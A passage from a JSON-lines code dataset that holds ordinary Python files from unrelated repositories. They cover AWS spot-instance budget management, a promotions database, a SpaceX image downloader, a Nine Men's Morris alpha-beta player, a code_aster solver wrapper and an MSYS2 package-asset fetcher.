input) data_hash : dataset hash stored in the database\n# \\param (command line input) nodes : maximum number of instances running\n# (id parameters is set as default to 41, can be changed in code)\n#\n# Before the iterations loop, this function sets the input parameters and\n# initializes the database connection, getting the number dataset and how many\n# tasks need to be 
completed.\n#\n# The most important part is after the initialization, in which the program\n# computes how much was spent (considering a Job Manager of type c5.4xlarge\n# and a 20GB 1000IOPS disk) and how many tasks were completed. With those\n# values, it verifies if any instance is constantly going over budget,\n# killing the ones that are and replacing them with instances that are not.\n#\n# If the experiment cannot continue due to budget constraints, then the budget\n# is increased by 10%.\n#\n# This loop ends after the main SPITS program finishes the execution (or the\n# number of tasks completed is greater or equal to the one stored in\n# the database).\ndef main():\n input_dict = {}\n for cur in sys.argv:\n if '=' in cur:\n key, val = cur.split('=')\n input_dict.update({key: val})\n\n interval = float(get_from_input(\"interval\", input_dict))\n\n budget = float(get_from_input(\"budget\", input_dict))\n data_hash = get_from_input(\"data_hash\", input_dict)\n target_nodes = int(get_from_input(\"nodes\", input_dict))\n\n valid_count = int(get_from_input(\"valid_count\", input_dict))\n if (valid_count == -1):\n valid_count = 1\n\n all_zones = ['us-east-1a', 'us-east-1b', 'us-east-1c', 'us-east-1d', 'us-east-1e', 'us-east-1f']\n\n idparameters = 41\n\n conn = rds_operations.rds_connect()\n target_tasks = rds_operations.get_interpols(conn, idparameters, rds_operations.get_iddata(conn, data_hash))\n iddata = rds_operations.get_iddata(conn, data_hash)\n\n spent_sofar = 0\n tasks_sofar = 0\n\n in_budget = budget\n _in_budget = in_budget\n in_tasks = target_tasks\n\n pareto(target_nodes, data_hash, idparameters)\n\n tasks_str = 'TASKS PROCESSED SO FAR = {}/{}'\n money_str = 'MONEY SPENT SO FAR = {}/{} (user requested = {})'\n money_left_str = 'MONEY LEFT TO SPEND = {} (user requested = {}) | TARGET RATIO = {}'\n instances_str = 'NUMBER OF INSTANCES RUNNING = {}/{}'\n simulated_time = 'TIMENOW = {}'\n\n ops = instance_operations(logger)\n time_start = ops.get_jobmanager_init_time()\n\n ec2 = boto3.client('ec2', region_name='us-east-1')\n cloudwatch = boto3.client('cloudwatch')\n\n log_to_csv = 'CSV\\t{}\\t{}'\n\n time_spent = 0\n\n run_dict = {}\n wk_spent_sofar = 0\n jm_spent_sofar = 0\n ec2_res = boto3.resource('ec2', region_name='us-east-1')\n #time.sleep(180)\n while target_tasks > 0:\n # Update cost\n jm_diff = (datetime.utcnow() - time_start)\n jm_spent_sofar = jm_diff.total_seconds() * (0.68+0.09375) / 3600\n\n for key,inst in run_dict.items():\n diff = datetime.utcnow() - inst[\"cur_time\"]\n inst[\"cur_time\"] = datetime.utcnow()\n wk_spent_sofar += float(inst[\"price\"]) * diff.total_seconds() / 3600\n inst[\"prev_valid\"] = inst[\"valid\"]\n inst[\"valid\"] = 0\n\n # Verifies running instances\n instance_reservations = ops.get_instance_reservations()\n for instance in instance_reservations['Reservations']:\n instance_id = instance['Instances'][0]['InstanceId']\n instance_type = instance['Instances'][0]['InstanceType']\n instance_az = instance['Instances'][0]['Placement']['AvailabilityZone']\n\n ec2_instance = ec2_res.Instance(instance_id)\n init_time = datetime.strptime(ec2_instance.launch_time.strftime(\"%Y-%m-%dT%H:%M:%S\"), \"%Y-%m-%dT%H:%M:%S\")\n\n result = cloudwatch.get_metric_statistics(Namespace='Performance',\n MetricName='perf_sec',\n StartTime=(datetime.today() - timedelta(minutes=2*interval)),\n Dimensions=[{'Name': 'Instance Id', 'Value': instance_id},\n {'Name': 'Type', 'Value': instance_type}],\n EndTime=datetime.today(),\n Period=60,\n Statistics=['Average'])\n\n 
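# 'tasks_completed' appears to be a cumulative counter, so only the window maximum is used below\n            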
tasks_completed = cloudwatch.get_metric_statistics(Namespace='Performance',\n MetricName='tasks_completed',\n StartTime=(datetime.today() - timedelta(minutes=2*interval)),\n Dimensions=[{'Name': 'Instance Id', 'Value': instance_id},\n {'Name': 'Type', 'Value': instance_type}],\n EndTime=datetime.today(),\n Period=60,\n Statistics=['Maximum'])\n\n result_stdev = cloudwatch.get_metric_statistics(Namespace='Performance',\n MetricName='perf_sec_stdev',\n StartTime=(datetime.today() - timedelta(minutes=2*interval)),\n Dimensions=[{'Name': 'Instance Id', 'Value': instance_id},\n {'Name': 'Type', 'Value': instance_type}],\n EndTime=datetime.today(),\n Period=60,\n Statistics=['Average'])\n\n if tasks_completed['Datapoints']:\n if (tasks_completed['Datapoints'][0]['Maximum']) > tasks_sofar:\n tasks_sofar = tasks_completed['Datapoints'][0]['Maximum']\n\n if not instance_id in run_dict:\n if result['Datapoints'] and result_stdev['Datapoints']:\n price = ops.get_current_spot_price(instance_type, instance_az) + 0.09375\n performance_negative = float(result['Datapoints'][0]['Average']) - float(\n result_stdev['Datapoints'][0]['Average'])\n\n instance_dict = {\"instance_id\":instance_id,\n \"instance_type\":instance_type,\n \"instance_az\":instance_az,\n \"price\":price,\n \"performance_negative\":performance_negative,\n \"init_time\":init_time,\n \"cur_time\": init_time,\n \"valid\":valid_count,\n \"prev_valid\": valid_count}\n\n run_dict[instance_id] = instance_dict\n else:\n price = ops.get_current_spot_price(instance_type, instance_az) + 0.09375\n instance_dict = {\"instance_id\": instance_id,\n \"instance_type\": instance_type,\n \"instance_az\": instance_az,\n \"price\": price,\n \"performance_negative\": -1,\n \"init_time\": init_time,\n \"cur_time\": init_time,\n \"valid\": valid_count,\n \"prev_valid\":valid_count}\n run_dict[instance_id] = instance_dict\n else:\n instance_dict = run_dict[instance_id]\n instance_dict[\"valid\"] = instance_dict[\"prev_valid\"]\n\n if result['Datapoints'] and result_stdev['Datapoints']:\n instance_dict[\"price\"] = ops.get_current_spot_price(instance_type, instance_az) + 0.09375\n instance_dict[\"performance_negative\"] = float(result['Datapoints'][0]['Average']) - float(result_stdev['Datapoints'][0]['Average'])\n\n spent_sofar = wk_spent_sofar + jm_spent_sofar\n\n target_tasks = in_tasks - tasks_sofar\n budget = in_budget - spent_sofar\n\n target_ratio = target_tasks / budget\n\n logger.info(simulated_time.format(datetime.now()))\n logger.info(tasks_str.format(tasks_sofar, in_tasks))\n logger.info(money_str.format(spent_sofar, in_budget, _in_budget))\n logger.info(money_left_str.format(budget, _in_budget, target_ratio))\n logger.info(instances_str.format(len(run_dict.keys()), target_nodes))\n logger.info(log_to_csv.format(((datetime.utcnow() - time_start).total_seconds()),spent_sofar))\n\n logger.debug(\"INSTANCES RUNNING\")\n for key,inst in run_dict.items():\n logger.debug(inst)\n\n if (target_tasks <= 0):\n break\n\n for key,inst in run_dict.items():\n if (inst[\"performance_negative\"]/(inst[\"price\"]/3600) < target_ratio or inst[\"performance_negative\"] == -1):\n inst[\"valid\"] -= 1\n logger.debug(\"DECREASING COUNTER FOR INST \" + inst[\"instance_id\"] + \"(\" + inst[\"instance_type\"] + \"), NOW: \" + str(inst[\"valid\"]))\n else:\n inst[\"valid\"] = min(inst[\"valid\"] + 1, valid_count)\n\n if (inst[\"valid\"] <= 0):\n logger.debug('REMOVING INST ' + inst[\"instance_id\"])\n ops.terminateInstance(inst[\"instance_id\"])\n\n\n for key in 
list(run_dict.keys()):\n            if run_dict[key][\"valid\"] <= 0:\n                del run_dict[key]\n\n        if (len(list(run_dict.keys())) < target_nodes):\n            candidates = []\n\n            while len(candidates) == 0:\n                budget = in_budget - spent_sofar\n                target_ratio = target_tasks / budget\n                all_performance = rds_operations.get_interpsec_allinstances(conn, iddata, idparameters)\n\n                for result in all_performance:\n                    instance_type = result[0]\n                    interpsec = result[1]\n                    stddev_interpsec = result[2]\n\n                    prices = ops.get_current_spot_price_allaz(instance_type)\n\n                    for az in prices:\n                        price = prices[az] + 0.09375\n                        costperinterp = float(interpsec / (price / 3600))\n                        costperinterp_stdev = float(stddev_interpsec / (price / 3600))\n                        costperinterp_negative = costperinterp - costperinterp_stdev\n\n                        instance_dict = {\"instance_id\": \"inactive\",\n                                         \"instance_type\": instance_type,\n                                         \"instance_az\": az,\n                                         \"price\": price,\n                                         \"performance_negative\": interpsec,\n                                         }\n\n                        if costperinterp_negative > target_ratio:\n                            temp = [inst for inst in run_dict.values() if inst['instance_type'] == instance_type and inst['instance_az'] == az]\n                            if (len(temp) == 0):\n                                candidates.append(instance_dict)\n                            else:\n                                for inst in temp:\n                                    if (inst not in candidates):\n                                        candidates.append(inst)\n\n                candidates.sort(key=operator.itemgetter('performance_negative'), reverse=True)\n\n                if (len(candidates) == 0):\n                    logger.error(\"IMPOSSIBLE TO RUN EXPERIMENT WITH THIS CONFIGURATION\")\n                    in_budget += in_budget / 10\n                    logger.error(\"INCREASING BUDGET BY 10% (TO \" + str(in_budget) + \" USD)\")\n\n            logger.debug(\"CANDIDATES\")\n            for inst in candidates:\n                logger.debug(inst)\n\n            k = 0\n            counter = 0\n            while len(run_dict.keys()) < target_nodes and counter < 5:\n                threads = []\n                num_threads = min(target_nodes - len(run_dict.keys()), int(target_nodes/5))\n                # Replace instances\n                for i in range(0, num_threads):\n                    thr = threading.Thread(target=ops.createSpotInstanceThreads, args=(candidates[k]['instance_type'], candidates[k]['instance_az'], candidates[k]['price'],valid_count,run_dict))\n                    thr.start()\n                    threads.append(thr)\n\n                for thr in threads:\n                    thr.join()\n\n                k = (k + 1) % len(candidates)\n                if k == 0:\n                    counter += 1\n\n        time.sleep(interval*60)\n\nif __name__ == \"__main__\":\n    logger = getLogger(__name__)\n    main()\n","repo_name":"hpg-cepetro/CloudPITS","sub_path":"main/to_execute.py","file_name":"to_execute.py","file_ext":"py","file_size_in_byte":16843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"35343766735","text":"import peewee\nfrom datetime import datetime, timedelta\n\nfrom helpers.Paths import DATABASE_PATH\n\ndatabase = peewee.SqliteDatabase(DATABASE_PATH, timeout=3, pragmas={'journal_mode': 'wal'})\n\n\nclass BaseTable(peewee.Model):\n    class Meta:\n        database = database\n\n\nclass Actions(BaseTable):\n    \"\"\"Table generation\"\"\"\n    partner = peewee.CharField()\n    name = peewee.CharField()\n    start_date = peewee.DateTimeField()\n    end_date = peewee.DateTimeField()\n    last_update = peewee.DateTimeField()\n\n\ndef create_database():\n    \"\"\"Create the tables if they do not exist yet\"\"\"\n    database.create_tables([Actions, ])\n\n\ndef add_to_database(partner, name, start_date, end_date, last_update=None):\n    \"\"\"Add a new record to the database\"\"\"\n    if isinstance(start_date, str):\n        start_date = datetime.strptime(start_date, '%d.%m.%Y')\n    if isinstance(end_date, str):\n        end_date = datetime.strptime(end_date, '%d.%m.%Y')\n    end_date = end_date.replace(hour=23, minute=59, second=59)\n    last_update = 
datetime.strptime(last_update, '%d.%m.%Y') if isinstance(last_update, str) else datetime.now()\n    Actions.create(partner=partner,\n                   name=name,\n                   start_date=start_date,\n                   end_date=end_date,\n                   last_update=last_update)\n\n\ndef check_actions_on_name(name):\n    \"\"\"Check whether a promotion with this name already exists in the database\"\"\"\n    for action in Actions.select():\n        if action.name == name:\n            return True\n\n\ndef delete_expired_actions(queue):\n    \"\"\"Delete promotions whose end date has already passed\"\"\"\n    queue.put(\n        f'Expired promotions deleted from the database: {Actions.delete().where(Actions.end_date < datetime.now()).execute()}')\n\n\ndef show_expired_actions():\n    \"\"\"Print expired promotions to the screen\"\"\"\n    try:\n        yesterday = datetime.now()-timedelta(days=2)\n        partner = Actions.select().where(Actions.end_date < yesterday).get().partner\n        name = Actions.select().where(Actions.end_date < datetime.now()).get().name\n        start_date = Actions.select().where(Actions.end_date < datetime.now()).get().start_date.strftime('%d.%m.%Y')\n        end_date = Actions.select().where(Actions.end_date < datetime.now()).get().end_date.strftime('%d.%m.%Y')\n        print(f'Promotion expired: {partner}: {name}, {start_date} - {end_date}')\n    except:\n        pass\n\ndef print_stat(queue):\n    \"\"\"Print last-update statistics to the screen\"\"\"\n    try:\n        query = Actions.select(Actions.partner, Actions.last_update).order_by(Actions.last_update)\n        statistics = {}\n        for distinct_ts in query.tuples():\n            statistics[distinct_ts[0]] = distinct_ts[1].strftime('%d.%m.%Y')\n        for partner, end_date in statistics.items():\n            queue.put(f'Partner: {partner}, last update {end_date}')\n    except:\n        queue.put('The database is empty')\n\n\ndef show_actions():\n    \"\"\"Print all promotions stored in the database\"\"\"\n    for row in Actions.select().tuples():\n        row = list(row)\n        row[3] = row[3].strftime('%d.%m.%Y')\n        row[4] = row[4].strftime('%d.%m.%Y')\n        row[5] = row[5].strftime('%d.%m.%Y')\n        print(*row)\n\n\n#TODO Remove\ndef actions_exists_in_db(partner, name, start_date, end_date):\n    \"\"\"Add the promotion if it is not in the database yet\"\"\"\n    if check_actions_on_name(name) is None:\n        add_to_database(partner, name, start_date, end_date)\n        return False\n    else:\n        print('a promotion with this name already exists in the database')\n        return True\n\ndef actions_exists_in_db_new(action):\n    \"\"\"Add the promotion if it is not in the database yet\"\"\"\n    if check_actions_on_name(action.name) is None:\n        add_to_database(action.partner_name, action.name, action.start, action.end)\n        return False\n    else:\n        print('a promotion with this name already exists in the database')\n        return True\n\n\ndef clear_partner_info(partner):\n    \"\"\"Delete all records for a partner\"\"\"\n    print(f'Deleted {Actions.delete().where(Actions.partner == partner).execute()} promotions for partner {partner}')\n","repo_name":"Balrock1989/DT","sub_path":"database/DataBase.py","file_name":"DataBase.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"20532128999","text":"import requests\r\nimport os\r\nfrom utils import load_img_with_pillow\r\n\r\n\r\ndef get_spacex_images_urls():\r\n    url = \"https://api.spacexdata.com/v4/launches/latest\"\r\n    response = requests.get(url=url)\r\n    response.raise_for_status()\r\n    links = response.json()['links']['flickr']['original']\r\n    return links\r\n\r\n\r\ndef fetch_spacex_last_launch(path):\r\n    name = \"spacex\"\r\n    links = get_spacex_images_urls()\r\n    for num, link in enumerate(links):\r\n        temp_path = os.path.join(path, 
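# produces names like spacex_0, spacex_1, ...; any file extension is presumably appended by load_img_with_pillow\r\n                                 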
f'{name}_{num}')\r\n load_img_with_pillow(url=link, path=temp_path)\r\n\r\n","repo_name":"Mikhail-Gl96/Space_instagram","sub_path":"fetch_spacex.py","file_name":"fetch_spacex.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2985936784","text":"import sys\r\n\r\nclass ABOpening:\r\n def __init__(self):\r\n self.leavesEvaluated = 0\r\n\r\n def findBestMove(self, board, depth):\r\n bestMove = board\r\n bestEstimate = float('-inf')\r\n possibleMoves = self.generateMovesOpening(board)\r\n for move in possibleMoves:\r\n estimate = self.abMinMax(move, depth-1, bestEstimate, float(\"inf\"))\r\n if estimate > bestEstimate:\r\n bestEstimate = estimate\r\n bestMove = move\r\n return (bestMove, self.leavesEvaluated, bestEstimate)\r\n\r\n def abMinMax(self, board, depth, alpha, beta):\r\n if depth == 0:\r\n self.leavesEvaluated += 1\r\n return self.staticEstimateOpening(board)\r\n bestEstimate = float('inf')\r\n possibleMoves = self.generateBlackMovesOpening(board)\r\n for move in possibleMoves:\r\n estimate = self.abMaxMin(move, depth - 1, alpha, beta)\r\n if estimate <= bestEstimate:\r\n bestEstimate = estimate\r\n if bestEstimate <= alpha:\r\n return bestEstimate\r\n beta = min(beta, bestEstimate)\r\n return bestEstimate\r\n\r\n def abMaxMin(self, board, depth, alpha, beta):\r\n if depth == 0:\r\n self.leavesEvaluated += 1\r\n return self.staticEstimateOpening(board)\r\n bestEstimate = float('-inf')\r\n possibleMoves = self.generateMovesOpening(board)\r\n for move in possibleMoves:\r\n estimate = self.abMinMax(move, depth - 1, alpha, beta)\r\n if estimate >= bestEstimate:\r\n bestEstimate = estimate\r\n if bestEstimate >= beta:\r\n return bestEstimate\r\n alpha = max(alpha, bestEstimate)\r\n return bestEstimate\r\n\r\n def generateMovesOpening(self, board):\r\n return self.generateAdd(board)\r\n\r\n def generateAdd(self, board):\r\n possibleMoves = []\r\n for location in range(18):\r\n if board[location] == 'x':\r\n if location == 0:\r\n possibleBoard = 'W' + board[1:]\r\n elif location == 17:\r\n possibleBoard = board[:17] + 'W'\r\n else:\r\n possibleBoard = board[:location]+'W'+board[location+1:]\r\n #print(possibleBoard, len(possibleBoard))\r\n if self.closeMill(location, possibleBoard):\r\n possibleMoves = self.generateRemove(possibleBoard, possibleMoves)\r\n else:\r\n possibleMoves.append(possibleBoard)\r\n return possibleMoves\r\n\r\n def generateRemove(self, board, possibleMoves):\r\n opponentPieceAvailable = False\r\n for location in range(18):\r\n if board[location] == 'B' and not self.closeMill(location, board):\r\n opponentPieceAvailable = True\r\n if location == 0:\r\n possibleBoard = 'x' + board[1:]\r\n elif location == 17:\r\n possibleBoard = board[:17] + 'x'\r\n else:\r\n possibleBoard = board[:location]+'x'+board[location+1:]\r\n #print(possibleBoard, len(possibleBoard), location)\r\n possibleMoves.append(possibleBoard)\r\n if not opponentPieceAvailable:\r\n possibleMoves.append(board)\r\n return possibleMoves\r\n\r\n def closeMill(self, location, board):\r\n piece = board[location]\r\n if location == 0 and (board[2] == piece and board[4] == piece):\r\n return True\r\n elif location == 1 and ((board[3] == piece and board[5] == piece) or (board[8] == piece and board[17] == piece)):\r\n return True\r\n elif location == 2 and (board[0] == piece and board[4] == piece):\r\n return True\r\n elif location == 3 and ((board[1] == piece and board[5] == piece) or (board[7] == piece and 
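# i.e. the two mills through point 3: {1, 3, 5} and {3, 7, 14}\r\n                              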
board[14] == piece)):\r\n return True\r\n elif location == 4 and (board[0] == piece and board[2] == piece):\r\n return True\r\n elif location == 5 and ((board[1] == piece and board[3] == piece) or (board[11] == piece and board[6] == piece)):\r\n return True\r\n elif location == 6 and ((board[7] == piece and board[8] == piece) or (board[5] == piece and board[11] == piece)):\r\n return True\r\n elif location == 7 and ((board[6] == piece and board[8] == piece) or (board[3] == piece and board[14] == piece)):\r\n return True\r\n elif location == 8 and ((board[6] == piece and board[7] == piece) or (board[1] == piece and board[17] == piece)):\r\n return True\r\n elif location == 9 and ((board[10] == piece and board[11] == piece) or (board[12] == piece and board[15] == piece)):\r\n return True\r\n elif location == 10 and ((board[9] == piece and board[11] == piece) or (board[13] == piece and board[16] == piece)):\r\n return True\r\n elif location == 11 and ((board[5] == piece and board[6] == piece) or (board[9] == piece and board[10] == piece) or (board[14] == piece and board[17] == piece)):\r\n return True\r\n elif location == 12 and ((board[9] == piece and board[15] == piece) or (board[13] == piece and board[14] == piece)):\r\n return True\r\n elif location == 13 and ((board[10] == piece and board[16] == piece) or (board[12] == piece and board[14] == piece)):\r\n return True\r\n elif location == 14 and ((board[3] == piece and board[7] == piece) or (board[12] == piece and board[13] == piece) or (board[11] == piece and board[17] == piece)):\r\n return True\r\n elif location == 15 and (board[9] == piece and board[12] == piece or (board[16] == piece and board[17] == piece)):\r\n return True\r\n elif location == 16 and ((board[10] == piece and board[13] == piece) or (board[15] == piece and board[17] == piece)):\r\n return True\r\n elif location == 17 and ((board[1] == piece and board[8] == piece) or (board[11] == piece and board[14] == piece) or (board[15] == piece and board[16] == piece)):\r\n return True\r\n else:\r\n return False\r\n\r\n def staticEstimateOpening(self, board):\r\n numWhitePieces = 0\r\n numBlackPieces = 0\r\n for piece in board:\r\n if piece =='W':\r\n numWhitePieces += 1\r\n elif piece == 'B':\r\n numBlackPieces += 1\r\n return (numWhitePieces - numBlackPieces)\r\n\r\n def swapPieces(self, board):\r\n boardAsList = [state for state in board]\r\n for location in range(18):\r\n if boardAsList[location] == 'B':\r\n boardAsList[location] = 'W';\r\n elif boardAsList[location] == 'W':\r\n boardAsList[location] = 'B';\r\n return ''.join(boardAsList)\r\n\r\n def generateBlackMovesOpening(self, board):\r\n swappedBoard = self.swapPieces(board)\r\n possibleMovesSwapped = self.generateMovesOpening(swappedBoard)\r\n #print(swappedBoard, possibleMovesSwapped)\r\n possibleMoves = []\r\n for move in possibleMovesSwapped:\r\n possibleMoves.append(self.swapPieces(move))\r\n #print(board, possibleMoves)\r\n return possibleMoves\r\n\r\ninputFile = open(sys.argv[1], 'r')\r\noutputFile = open(sys.argv[2], 'w')\r\ndepth = int(sys.argv[3])\r\nboardPosition = inputFile.readline()\r\ninputFile.close()\r\ngame = ABOpening()\r\nbestMove, numPosEvaluated, bestEstimate = game.findBestMove(boardPosition, depth)\r\noutputFile.write(\"Board Position: \" + bestMove + \"\\nPositions evaluated by static estimate: \" + str(numPosEvaluated) + \"\\nMINIMAX estimate: \" + str(bestEstimate))\r\noutputFile.close()\r\nprint(\"Board Position:\", bestMove)\r\nprint(\"Positions evaluated by static estimate:\", 
numPosEvaluated)\r\nprint(\"MINIMAX estimate:\", bestEstimate)","repo_name":"Devarshaa/AI-9MenMorris-Player","sub_path":"ABOpening.py","file_name":"ABOpening.py","file_ext":"py","file_size_in_byte":7828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20428168481","text":"from ..Cata.Syntax import _F\nfrom ..Helpers import adapt_for_mgis_behaviour\nfrom ..Messages import UTMESS\nfrom ..Objects import (\n HHO,\n FrictionType,\n MechanicalDirichletBC,\n MechanicalLoadFunction,\n MechanicalLoadReal,\n NonLinearResult,\n ParallelMechanicalLoadFunction,\n ParallelMechanicalLoadReal,\n PhysicalProblem,\n)\nfrom ..Solvers import ContactManager, NonLinearSolver, ProblemSolver\nfrom ..Solvers import SolverOptions as SOP\nfrom ..Solvers import TimeStepper\nfrom ..Utilities import print_stats, reset_stats\n\n\ndef _contact_check(CONTACT):\n \"\"\"Add controls to prohibit unconverted features in contact\"\"\"\n if CONTACT:\n assert CONTACT[0][\"ALGO_RESO_GEOM\"] == \"NEWTON\"\n\n defi = CONTACT[0][\"DEFINITION\"]\n\n for zone in defi.getContactZones():\n assert not zone.hasSmoothing\n assert zone.getPairingParameter().getDistanceFunction() is None\n assert zone.getPairingParameter().getElementaryCharacteristics() is None\n\n if zone.hasFriction:\n assert zone.getFrictionParameter().getType() == FrictionType.Without\n\n if defi.hasFriction:\n assert CONTACT[0][\"ALGO_RESO_FROT\"] == \"NEWTON\"\n\n\ndef _keywords_check(keywords):\n \"\"\"Add controls to prohibit unconverted features.\"\"\"\n\n if \"EXCIT\" in keywords:\n for load in keywords[\"EXCIT\"]:\n if load[\"TYPE_CHARGE\"] != \"FIXE_CSTE\":\n raise RuntimeError(\"TYPE_CHARGE not supported\")\n\n if \"INCREMENT\" in keywords:\n if \"NUME_INST_INIT\" in keywords[\"INCREMENT\"] or \"NUME_INST_FIN\" in keywords[\"INCREMENT\"]:\n raise RuntimeError(\"unsupported value in INCREMENT\")\n # FIXME todo: check consistency between INST_INIT and INST_ETAT_INIT\n\n if \"CONVERGENCE\" in keywords:\n for key in keywords[\"CONVERGENCE\"]:\n if key in (\"RESI_REFE_RELA\", \"RESI_COMP_RELA\"):\n raise RuntimeError(\"unsupported value in CONVERGENCE: %s\" % key)\n\n if keywords[\"METHODE\"] not in [\"NEWTON\", \"SNES\"]:\n raise RuntimeError(\"unsupported value in METHODE\")\n\n\ndef meca_non_line_ops(self, **args):\n \"\"\"Execute the command.\n\n Arguments:\n **args (dict): User's keywords.\n \"\"\"\n UTMESS(\"A\", \"QUALITY1_2\")\n reset_stats()\n\n args = _F(args)\n\n # Add controls to prohibit unconverted features\n _contact_check(args[\"CONTACT\"])\n _keywords_check(args)\n adapt_for_mgis_behaviour(self, args)\n\n # Create the problem solver\n solver = ProblemSolver(NonLinearSolver(), NonLinearResult())\n\n # Create the physical problem (and use it in problem solver)\n phys_pb = PhysicalProblem(args[\"MODELE\"], args[\"CHAM_MATER\"], args[\"CARA_ELEM\"])\n solver.use(phys_pb)\n\n # Add parameters\n param = dict(\n ARCHIVAGE=args[\"ARCHIVAGE\"],\n COMPORTEMENT=args[\"COMPORTEMENT\"],\n CONTACT=args[\"CONTACT\"],\n CONVERGENCE=args[\"CONVERGENCE\"],\n ETAT_INIT=args[\"ETAT_INIT\"],\n INFO=args[\"INFO\"],\n METHODE=args[\"METHODE\"],\n NEWTON=args[\"NEWTON\"],\n RECH_LINEAIRE=args[\"RECH_LINEAIRE\"],\n SOLVEUR=args[\"SOLVEUR\"],\n )\n solver.setKeywords(**param)\n\n # Add loads\n if args[\"EXCIT\"]:\n for load in args[\"EXCIT\"]:\n if isinstance(\n load[\"CHARGE\"],\n (\n MechanicalLoadFunction,\n MechanicalLoadReal,\n ParallelMechanicalLoadFunction,\n ParallelMechanicalLoadReal,\n 
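# sequential and parallel load objects are accepted alike\n                    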
MechanicalDirichletBC,\n ),\n ):\n phys_pb.addLoadFromDict(load)\n else:\n raise RuntimeError(\"Unknown load\")\n\n # Add contact\n contact_manager = None\n if args[\"CONTACT\"]:\n definition = args[\"CONTACT\"][0][\"DEFINITION\"]\n contact_manager = ContactManager(definition, phys_pb)\n fed_defi = definition.getFiniteElementDescriptor()\n phys_pb.getListOfLoads().addContactLoadDescriptor(fed_defi, None)\n\n solver.use(contact_manager)\n\n # Add stepper\n timeStepper = TimeStepper.from_keywords(**args[\"INCREMENT\"][0])\n solver.use(timeStepper)\n\n # Add Hook\n class PostHookHHO:\n \"\"\"User object to be used as a PostStepHook.\"\"\"\n\n provide = SOP.PostStepHook\n\n def __call__(self, nl_solver):\n \"\"\"Hook to compute HHO_DEPL\"\"\"\n\n if nl_solver.phys_pb.getModel().existsHHO():\n hho_field = HHO(nl_solver.phys_pb).projectOnLagrangeSpace(\n nl_solver.phys_state.primal_curr\n )\n storage_manager = nl_solver.get_feature(SOP.Storage)\n storage_manager.storeField(hho_field, \"HHO_DEPL\", nl_solver.phys_state.time_curr)\n\n solver.use(PostHookHHO())\n\n # Run computation\n solver.run()\n print_stats()\n reset_stats()\n return solver.result\n","repo_name":"Krande/code-aster-copy","sub_path":"code_aster/MacroCommands/meca_non_line_ops.py","file_name":"meca_non_line_ops.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38566706848","text":"import fnmatch\nimport os\nfrom concurrent.futures import ThreadPoolExecutor\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Tuple\n\nfrom github.GitReleaseAsset import GitReleaseAsset\n\nfrom .config import BuildType, Config\nfrom .gh import (CachedAssets, download_asset, get_asset_filename,\n get_asset_mtime_ns, is_asset_from_gha, get_asset_uploader_name)\nfrom .queue import PackageStatus, get_buildqueue_with_status\nfrom .utils import ask_yes_no\n\n\ndef get_repo_subdir(build_type: BuildType) -> Path:\n if build_type in Config.MSYS_ARCH_LIST:\n return Path(\"msys\") / \"x86_64\"\n elif build_type == Config.MSYS_SRC_BUILD_TYPE:\n return Path(\"msys\") / \"sources\"\n elif build_type == Config.MINGW_SRC_BUILD_TYPE:\n return Path(\"mingw\") / \"sources\"\n elif build_type in Config.MINGW_ARCH_LIST:\n return Path(\"mingw\") / build_type\n else:\n raise Exception(\"unknown type\")\n\n\ndef fetch_assets(args: Any) -> None:\n target_dir = os.path.abspath(args.targetdir)\n fetch_all = args.fetch_all\n fetch_complete = args.fetch_complete\n\n all_patterns: Dict[BuildType, List[str]] = {}\n all_blocked = []\n for pkg in get_buildqueue_with_status():\n for build_type in pkg.get_build_types():\n if args.build_type and build_type not in args.build_type:\n continue\n status = pkg.get_status(build_type)\n pkg_patterns = pkg.get_build_patterns(build_type)\n if status == PackageStatus.FINISHED:\n all_patterns.setdefault(build_type, []).extend(pkg_patterns)\n elif status in [PackageStatus.FINISHED_BUT_BLOCKED,\n PackageStatus.FINISHED_BUT_INCOMPLETE]:\n if fetch_all or (fetch_complete and status != PackageStatus.FINISHED_BUT_INCOMPLETE):\n all_patterns.setdefault(build_type, []).extend(pkg_patterns)\n else:\n all_blocked.append(\n (pkg[\"name\"], build_type, pkg.get_status_details(build_type)))\n\n all_assets = {}\n cached_assets = CachedAssets()\n assets_to_download: Dict[BuildType, List[GitReleaseAsset]] = {}\n for build_type, patterns in all_patterns.items():\n if build_type not in all_assets:\n all_assets[build_type] = 
cached_assets.get_assets(build_type)\n assets = all_assets[build_type]\n\n assets_mapping: Dict[str, List[GitReleaseAsset]] = {}\n for asset in assets:\n assets_mapping.setdefault(get_asset_filename(asset), []).append(asset)\n\n for pattern in patterns:\n matches = fnmatch.filter(assets_mapping.keys(), pattern)\n if matches:\n found = assets_mapping[matches[0]]\n assets_to_download.setdefault(build_type, []).extend(found)\n\n to_fetch = {}\n for build_type, assets in assets_to_download.items():\n for asset in assets:\n asset_dir = Path(target_dir) / get_repo_subdir(build_type)\n asset_path = asset_dir / get_asset_filename(asset)\n to_fetch[str(asset_path)] = asset\n\n if not args.noconfirm:\n for path, asset in to_fetch.items():\n if not is_asset_from_gha(asset):\n if not ask_yes_no(f\"WARNING: {get_asset_filename(asset)!r} is a manual upload \"\n f\"from {get_asset_uploader_name(asset)!r}, continue?\"):\n raise SystemExit(\"aborting\")\n\n def file_is_uptodate(path: str, asset: GitReleaseAsset) -> bool:\n asset_path = Path(path)\n if not asset_path.exists():\n return False\n if asset_path.stat().st_size != asset.size:\n return False\n if get_asset_mtime_ns(asset) != asset_path.stat().st_mtime_ns:\n return False\n return True\n\n # find files that are either wrong or not what we want\n to_delete = []\n not_uptodate = []\n for root, dirs, files in os.walk(target_dir):\n for name in files:\n existing = os.path.join(root, name)\n if existing in to_fetch:\n asset = to_fetch[existing]\n if not file_is_uptodate(existing, asset):\n to_delete.append(existing)\n not_uptodate.append(existing)\n else:\n to_delete.append(existing)\n\n if args.delete and not args.pretend:\n # delete unwanted files\n for path in to_delete:\n os.remove(path)\n\n # delete empty directories\n for root, dirs, files in os.walk(target_dir, topdown=False):\n for name in dirs:\n path = os.path.join(root, name)\n if not 